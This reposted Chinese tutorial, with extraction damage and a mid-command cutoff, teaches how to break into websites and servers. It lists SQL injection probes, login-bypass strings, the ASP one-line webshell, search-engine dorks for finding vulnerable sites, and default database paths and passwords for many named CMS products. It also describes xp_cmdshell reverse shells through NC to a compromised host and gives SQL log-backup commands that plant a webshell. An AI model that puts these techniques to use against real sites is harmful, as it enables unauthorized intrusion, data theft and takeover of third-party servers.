【Asp.net精品源码栏目提醒】:以下是网学会员为您推荐的Asp.net精品源码-【精品】:入侵网站服务器的方法 - 培训教程,希望本篇文章对您学习有所帮助。
http://hi.baidu.com/night100/blog/item/62fd6a85fd939920c65cc3ba.html 1入侵网站服务器的8种方法 1、SQL注入漏洞的入侵 这种是ASPACCESS的网站入侵方式通过注入点列出数据库里面管理员的帐号和密码信息然后猜解出网站的后台地址然后用帐号和密码登录进去找到文件上传的地方把ASP木马上传上去获得一个网站的WEBSHELL。
2、ASP上传漏洞的利用 这种技术方式是利用一些网站的ASP上传功能来上传ASP木马的一种入侵方式不少网站都限制了上传文件的类型一般来说ASP为后缀的文件都不允许上传但是这种限制是可以被黑客突破的黑客可以采取COOKIE欺骗的方式来上传ASP木马获得网站的WEBSHELL权限。
3、后台数据库备份方式获得WEBSHELL 这个主要是利用网站后台对ACCESS数据库进行数据库备份和恢复的功能备份数据库路径等变量没有过滤导致可以把任何文件的后缀改成ASP那么利用网站上传的功能上传一个文件名改成JPG或者GIF后缀的ASP木马然后用这个恢复库备份和恢复的功能把这个木马恢复成ASP文件从而达到能够获取网站WEBSHELL控制权限的目的。
4、 网站旁注入侵 这种技术是通过IP绑定域名查询的功能查出服务器上有多少网站然后通过一些薄弱的网站实施入侵拿到权限之后转而控制服务器的其它网站。
5、sa注入点利用的入侵技术 这种是ASPMSSQL网站的入侵方式找到有SA权限的SQL注入点然后用SQL数据库的XP_CMDSHELL的存储扩展来运行系统命令建立系统级别的帐号然后通过3389登录进去或者在一台肉鸡上用NC开设一个监听端口然后用VBS一句话木马下载一个NC到服务器里面接着运行NC的反向连接命令让服务器反向连接到远程肉鸡上这样远程肉鸡就有了一个远程的系统管理员级别的控制权限。
6、sa弱密码的入侵技术 这种方式是用扫描器探测SQL的帐号和密码信息的方式拿到SA的密码然后用SQLEXEC之类的工具通过1433端口连接到远程服务器上然后开设系统帐号通过3389登录。
然后这种入侵方式还可以配合WEBSHELL来使用一般的ASPMSSQL网站通常会把MSSQL的连接密码写到一个配置文件当中这个可以用WEBSHELL来读取配置文件里面的SA密码然后可以上传一个SQL木马的方式来获取系统的控制权限。
7、提交一句话木马的入侵方式 这种技术方式是对一些数据库地址被改成asp文件的网站来实施入侵的。
黑客通过网站的留言版论坛系统等功能提交一句话木马到数据库里面然后在木马客户端里面输入这个网站的数据库地址并提交就可以把一个ASP木马写入到网站里面获取网站的WEBSHELL权限。
8、 论坛漏洞利用入侵方式 这种技术是利用一些论坛存在的安全漏洞来上传ASP木马获得WEBSHELL权限最典型的就是动网6.0版本7.0版本都存在安全漏洞拿7.0版本来说注册一个正常的用户然后用抓包工具抓取用户提交一个ASP文件的COOKIE然后用明小子之类的软件采取COOKIE欺骗的上传方式就可以上传一个ASP木马获得网站的WEBSHELL。
2入侵网站的14种可利用方法 1.上传漏洞 upfile.asp upload.aspupload_flash.asp upfile_soft.aspupfile_softpic.asp pS: 如果看到:选择你要上传的文件 重新上传或者出现“请登陆后使用”80就有漏洞了 有时上传不一定会成功这是因为Cookies不一样.我们就要用WSockExpert取得Cookies.再用DOMAIN上传。
还有一些只是检测文件类型的没有进行后缀名判断这样的上传只需要把木马文件的开关加个GIF89a就可以通过了。
而且可以上传任意文件在asp和
asp.net测试中都可以上传。
2.注入漏洞 pS:对MD5密码.有时我们不是哪么容易跑出来.如果是SQL数据库.那么我们可以用以下命令: http://注入网址update admin set password’新MD5密码’ where password’旧MD5密码’-- admin为表名. //看看是什么权限的如果权限高的话直接用SQLTOOLS进行连接就可以执行系统命令了。
http://注入网址 and 1Select IS_MEMBERdb_owner http://注入网址 And char1242BCastIS_MEMBERdb_owner as varchar12Bchar1241 -- //检测是否有读取某数据库的权限 http://注入网址 and 1 Select HAS_DBACCESSmaster http://注入网址 And char1242BCastHAS_DBACCESSmaster as varchar12Bchar1241 -- 3.旁注也就是跨站 我们入侵某站时可能这个站坚固的无懈可击我们可以找下和这个站同一服务器的站点然后在利用这个站点用提权嗅探等方法来入侵我们要入侵的站点。
在这里有个难点就是一些服务器的绝对路径经过加密这就看我们的本事了。
4.暴库:把二级目录中间的/换成5c eg:http://www.xxx.com/myhome/otherweb ... s.aspBigClassName职责范围ampBigClassType1 换成这样的形式提交http://www.xxx.com/myhome5Cotherweb ... s.aspBigClassName职责范围ampBigClassType1 如果你能看到’E:/ahttc040901/otherweb/dz/database/iXuEr_Studio.asa’不是一个有效的路径。
确定路径名称拼写是否正确以及是否连接到文件存放的服务器。
这样的就是数据库了。
下载时用FLASHGET换成.MDB格式的就行. 5.绕过密码验证直接进入后台 ’or’’or’这是一个可以连接SQL的语名句.可以直接进入后台。
我收集了一下。
类似的还有 ’or’’’ quot or quotaquotquota ’ or ’a’’a quot or quotaquotquota or 11-- or ’a’’a 6.社会工程学 这个我们都知道吧。
就是猜解。
猜解一些人们常用的密码比如他的生日啊[网学网用户上传]啊。
办公电话啊等等。
。
http://www.xxx.cn/waishi/admin admin waishi .写入ASP格式数据库 就是一句话木马〈execute requestquotvaluequot〉 常用在留言本. http://www.xxx.cn/ebook/db/ebook.asp这个就是ASP格式的数据库再写入一句话木马然后利用ASP后缀名的数据库进行写入木马。
也提醒一下站长MDB数据库改为.asp后缀也是不安全的。
8.
源码利用 很多网站用的都是网上下载的
源码有的站长很懒什么也不改。
然后就上传开通网站了像这样的网站只要知道他用的什么网站的
源码做的自己去网上下载一个然后就有很多信息可以利用了。
像数据库备份网站后台啊原始数据库路径啊上传文件的路径啊等等都可以进行利用。
EY:http://www.xxxx.edu.cn/xiaoyoulu/index.asp 这个站用的是杰出校友录
源码我下过了 默认数据库/webshell路径/database/liangu_data.mdb 后台管理adm_login.asp 密码及用户名都是admin 9.默认数据库/webshell路径利用 这样的网站很多/利人别人的WEBSHELL. /Databackup/dvbbs7.MDB /bbs/Databackup/dvbbs7.MDB /bbs/Data/dvbbs7.MDB /data/dvbbs7.mdb /bbs/diy.asp /diy.asp /bbs/cmd.asp /bbs/cmd.exe /bbs/s-u.exe /bbs/servu.exe 工具网站猎手 挖掘鸡 EYhttp://www.xxx.com/bbs/Databackup/dvbbs7.MDB 10.查看目录法有一些网站可以浏览目录可以看到目录下所有的文件。
EYhttp://www.xxx.com/shop/admin/ http://www.xxx.com/babyfox/admin/23bb23dedsed2s/ 这样我们可以找到数据库下载不用我教吧 11.工具溢出 .aspNewsID /2j.aspid18 .aspid这种方法可以取得大量的WEBSHELL 12.搜索引擎利用 1.inurl:flasher_list.asp 默认数据库:database/flash.mdb 后台/manager/ 2.找网站的管理后台地址: site:xxxx.comintext:管理 site:xxxx.comintitle:管理 〈关键字很多自已找〉 site:xxxx.cominurl:login 3.查找access的数据库mssql、mysql的连接文件 allinurl:bbsdata filetype:mdbinurl:database filetype:incconn inurl:datafiletype:mdb 13.COOKIE诈骗 把自己的ID修改成管理员的MD5密码也修改成他的用桂林老兵工具可以修改COOKIE。
然后就直接登录有了网站后台管理员权限了。
这个我就不多讲了 14.利用常见的漏洞如动网BBS EYhttp://www.xxx.com/bbs/index.asp 可以先用:dvbbs权限提升工具使自已成为前台管理员。
THEN运用:动网固顶贴工具找个固顶贴再取得COOKIES这个要你自已做。
我们可以用WSockExpert取得Cookies/NC包 3拿到webshell权限的45种方法 1 到GoogLe搜索一些关键字edit.asp 韩国肉鸡为多多数为MSSQL数据库 2 到Google site:cq.cn inurl:asp 3 利用挖掘鸡和一个ASP木马. 文件名是login.asp 路径组是/manage/ 关键词是went.asp 用oror来登陆 4 关键字Co Net MIB Ver 1.0网站后台管理系统 帐号密码为 oror 5. 动感购物系统 inurl:help.asp登陆如未注册成为会员 upLoad_bm1.asp和upLoad_c1.asp这两个随便选个一般管理员都忽视了这2漏洞 6。
默认数据库地址blogdata/acblog.asa 关键字acblog 7. 百度 /htdocs 注册里可以直接上传asa文件 8. /Database/newasp.mdb 关键词NewAsp SiteManageSystem Version 9. 用挖掘机 关键字Powered by WEBBOY 页面/upfile.asp 10. baidu中搜索关键字Ver5.0 Build 0519 存在上传漏洞 11. Upfile_Article.asp bbs/upfile.asp 输入关键字powered by mypower 12. inurl:winntsystem32inetsrv 在google里面输入这个就可以找到很多网站 13. 现在GOOGLE搜索关键字 intitle:网站小助手 inurl:asp 14. 键字 首页 最新动态 新手指南 舞曲音乐 下载中心 经典文章 玩家风采 装备购买 站内流言 友情连接 本站论坛 挖掘鸡的关键字 添 setup.asp 15. VBulletin论坛的数据库 默认数据库地址 /includes/functions.php 工具: 1.网站猎手 下载地址:百度 Google 2.Google 关键字: Powered by: vBulletin Version 3.0.1 Powered by: vBulletin Version 3.0.2 Powered by: vBulletin Version 3.0.3 其中一个就可以了 16. 1.打开百度或GOOGLE搜索输入powered by comersus ASP shopping cart open source。
这是一个商场系统。
2.网站的最底部分有个 Comersus Open Technologies LC。
打开看下comersus系统 猜到comersus.mdb. 是数据库名 数据库都是放在database/ 后的 所以database/comersus.mdb comersus_listCategoriesTree.asp换成database/comersus.mdb不能下载。
那样把前一个store/除去再加上database/comersus.mdb 试试 17. 无忧传奇官方站点程序。
1、后台管理地址http://您的域名/msmiradmin/ 2、默认后台管理帐号msmir 3、默认后台管理密码msmirmsmir 数据库文件为 http://您的域名/msmirdata/msmirArticle.mdb 数据库连接文件为 /Conn.asp 18. 百度里输入/skins/default/ 19. 利用挖掘机 关键机:power by Discuz 路径:/wish.php 配合: Discuz论坛 wish.php远程包含漏洞 工具使用 20. 上传漏洞. 工具 : Domain3.5 网站猎手 1.5版 关键字powered by mypower 检测的页面或文件插入upfile_photo.asp 21. 新云漏洞 这个漏洞ACCESS和SQL版通吃。
Google搜索关键字 quot关于本站 - 网站帮助 - 广告合作 - 下载声明 - 友情连接 - 网站地图 - 管理登录quot 把flash/downfile.aspurluploadfile/../../conn.asp提交到网站根目录。
就可以下载conn.asp 以
源码软件等下载站居多。
大家时常碰到数据库如果前面或者中间了 可以用23替换就可以下载了 database23newasp.mdb 如xzws.mdb 改成23xzws.mdb 22. 通吃所有商城动力上传系统 使用工具:挖掘鸡 v1.1 明小子 商城入侵: 关键字:选购-gt加入购物车-gt去收银台-gt确认收货人信息-gt选付款方式-gt选配送方式-gt在线支付或下单后汇款-gt汇款确认-gt发货-gt完成 漏洞页面:upload.asp upfile_flash.asp 动力入侵: 关键字:powered by mypower 漏洞页面:upfile_photo.asp Upfile_Soft.asp upfile_adpic.asp upfile_softpic.asp 23. 注射漏洞 百度搜索:oiojs blog 24 动易 列目录 admin_articlerecyclebin.asp inurl:admin_articlerecyclebin.asp 25. 工具:网站猎手 关键词:inurl:Went.asp 后缀:manage/login.asp 口令:oror 26. 入侵魔兽私服 需要的工具ASP木马一只。
Domain3.5明小子 关键字All Right Reserved Design:游戏联盟 后台地址admin/login.asp 数据库的地址chngame/chngame.mdb 27. 漏洞是利用管理员iis设置的失误 用baidu 关键字就是比较罕见的脚本名 动网: ReloadForumCache.asp Leadbbs: makealltopanc.asp BBSXP: admin_fso.asp 动易: admin_articlerecyclebin.asp 28. 国外站的爆库漏洞 关键字sad Ravens Guestbook 密码地址:/passwd.dat 后台地址:/admin.php 29. Discuz 4.1.0跨站漏洞 利用工具:1WAP浏览器 2WAP编码转换器 关键字:quotintext:Discuz 4.1.0quot 30. 关键字尚奈克斯 后台路径/system/manage.asp 直接传ASP木马 31. 工具 1:网站猎手 2:大马一个 关键字:切勿关闭Cookies功能否则您将不能登录 插入diy.asp 32. 关键字:Team5 Studio All rights reserved 默认数据库:data/team.mdb 33. 工具: 挖掘机 辅臣数据库读取器 关键字: 企业简介 产品展示 产品列表 后缀添加: /database/myszw.mdb 后台地址: admin/Login.asp 34. 关键子 XXX inurl:Nclass.asp 在quot系统设置quot里写个木马。
会被保存到 在 config.asp内。
35. 不进后台照样拿动网WEBSHELL data.aspactionBackupData 动网数据库备份默认路径 36. 工具:网站猎手 WebShell 关键字:inurl:Went.asp 后缀:manage/login.asp 弱口令:oror 37. 关键字:Powered by:QCDN_NEWS 随便扫遍文章加一个 来试探注入点 后台地址:admin_index.asp 38. 入侵雷池新闻发布系统 关键字:leichinews 去掉leichinews后面的. 打上:admin/uploadPic.aspactionTypemodamppicNamexuanran.asp 再上传马..... 进访问uppic anran.asp 登陆马. 39. 关键字:Power System Of Article Management Ver 3.0 Build 20030628 默认数据库:databaseyiuwekdsodksldfslwifds.mdb 后台地址:自己扫描 40. 一、通过GOOGLE搜索找大量注入点 关键字aspid1 gov.jp/ aspid 页数100 语言想入侵哪个国家就填什么语言吧 41. 关键字Powered by:94KKBBS 2005 利用密码找回功能 找回admin 提问:ddddd 回答:ddddd 42. 关键字:inurl:Went.asp 后台为manage/login.asp 后台密码: or 或者 oror 登录 进入 默认数据库地址:Database/DataShop.mdb 43. 关键字:六合彩 inurl:readnews.asp 把最后一个/改成5c 直接暴库看密码进后台 随便添加个新闻 在标题输入我们的一句话木马 44. 工具:一句话木马 BBsXp 5.0 sp1 管理员猜解器 关键词:powered by bbsxp5.00 进后台备份一句话马 45. 关键字程序核心BJXSHOP网上开店专家 后台:/admin 4注射入侵思路及流程 一 寻找并获得具有一定权限的注射漏洞网站 二 找出的注射漏洞网站一般分两种数据库类型mmsql 和access那么不同的数据库类型当然需要不同的入侵方法。
1. mmsql数据库 一是通过注射点爆出管理员用户和密码找出后台登录进一步提升权限。
二是通过注射点猜解网站所在服务器上的物理路径从而进行差异备份插入一句话木马客户端获得webshell后进一步进行权限提升。
2.access数据库对于这种数据库就只能是去爆管理的用户密码或者其他用户资料然后进行后台登录。
成功登录后台后获取webshell的方法一般是 1.cookie欺骗上传asp后门如果能直接上传asp马那算你运气好。
2.在无法上传asp后门的情况下上传图片文件后进行数据库操作功能备份成asp格式。
在网络安全攻与防之间有一门很重要的学问和艺术 社会工程学 社会工程学就是使人们顺从你的意愿、满足你的欲望。
举个例子在你发现一台有漏洞的目标服务器 却被断开网络物理隔离也就成了最安全的计算机然而你却能运用这门学问说服某人admin把这台有漏洞的已经隔离的计算机连上网络。
利用自己的思维去揣摩别人的心理促使其发生的非主意识的行为。
运用灵活的复杂的人际关系来获许想要得到的信息。
如何很好的利用社会工程学前提是对网络安全各方面都要有一定的了解和自己的认识。
也就是个人的综合能力在遇到一些问题后能够运用自己所掌握的知识和学问独立的去解决一些实际问题。
题外话当然入侵一个站点需要很好的运气说运气不如说是目标服务器的管理员大意疏忽的一些漏洞和bug被你挖掘到了那恭喜。
下面我们切入正题 实例中需要运用到的工具 流行注射工具NBSI3、啊D-SQL注射工具 明小子web综合检测工具 一.通过baidu google 简单找注射漏洞网站。
我们进入baidu或google的高级搜索选项以baidu为例如图1 我们要搜索内容是 被baidu收录的 具有黑客关键字的网站连接地址并且含有 asp的网址URL。
我们就可以从中寻找具有注射漏洞的网址。
例http://www.xxx.asp.com/show.aspid1 判断能否进行注入我们直接在后面加单引号’如果返回出错页面或许存在注射点。
如果网站管理员对sql注入有点了解把单引号过滤掉了你用单引号测试是测不到注入点的。
那么哪种判断方法准确呢下面就是为你介绍的经典的11、12测试法了。
看例 ① http://www.xxx.asp.com/show.aspid1 ② http://www.xxx.asp.com/show.aspid1 and 11 ③ http://www.xxx.asp.com/show.aspid1 and 12 看上面三个网址返回的结果可以注入的表现 ① 正常显示 ② 正常显示内容基本与①相同 ③ 返回出错页面或提示找不到记录、或显示内容为空。
不可以注入就比较容易判断了①同样正常显示②和③一般都会有程序定义的错误提示或提示类型转换时出错。
可以用一些注射相关的工具自行判断注射点如图2 推荐这种方法但原理还需掌握。
本教程的主题及篇幅有限其他相关的我就不多介绍了大家去找些关于sql原理的文章或教程看看。
二. 入侵思路及过程 access数据库对于这种数据库就只能是去爆管理的用户密码或者其他用户资料然后进行后台登录。
以工具为例注射爆出管理员用户及密码一般MD5加密如图3 手工破解原理我会在附带教程里打包建议大家看sql注入天书。
进入http://www.xmd5.com/ 或http://www.cmd5.com/ 对md5 密文进行爆破。
当然可以尝试暴力破解。
得到解密后密码如图4 找出后台地址登录后台获取webshell。
如图5 mmsql数据库 爆管理员密码和access数据库类似这里就不多讲。
sql注射中的DB_OWNER角色如果把sa等同于administrator的话DB_OWNER角色相当于user权限。
Sa权限的话既然是administrator那提权就不多讲。
这里讲下相当于user 的DB_OWNER权限获得webshell方法。
以前通常用backup但是如果对于大站数据库庞大成功率可想而知。
后来有了差异备份将马的代码插入到数据库中然后备份前后数据的差异部分。
这样比直接将数据库备份在体积上大大缩小了。
然而数据库内的一些数据由于偶然与备份后的代码冲突而出错导致失败成功率仍然很低。
现在最有效的方法是导出日志获得webshell。
先要了解DB_OWNER权限下通过以上方法获取webshell的一些必要条件。
1 Web和数据库在同一服务器 2 已经得到网站绝对路径 3 你要备份到的目的目录有写的权限 4 有backup的权限 下面实例讲解 注射点http://www.xxxxx.dk/off_vis_film.aspid154 用工具啊D检测情况如图6 接下来试试列目录的功能如果能列目录仔细找只要不是数据库与web分离的就能找网站目录。
这是个苦力活耐心点。
alter database ZZZZ set RECOVERY FULL create table cmd a image backup log ZZZZ to disk c:Sammy with init insert into cmd a values ltExecuterequestquotaquotgt backup log ZZZZ to disk c:webma.asp 这里ZZZZ表示数据库名 c:web 表示网站绝对路径 ltExecuterequestquotaquotgt 一句话马 实际操作过程中我们把字符转换下 先执行: alter database XXXX set RECOVERY FULL //把数据库日志备份类型转换为int 第 一 步: 新建一个临时表 create tab.
上一篇:
XSP的单声道:开源ASP NET开发
下一篇:
关于搞好高职学生政治经济学教学的思考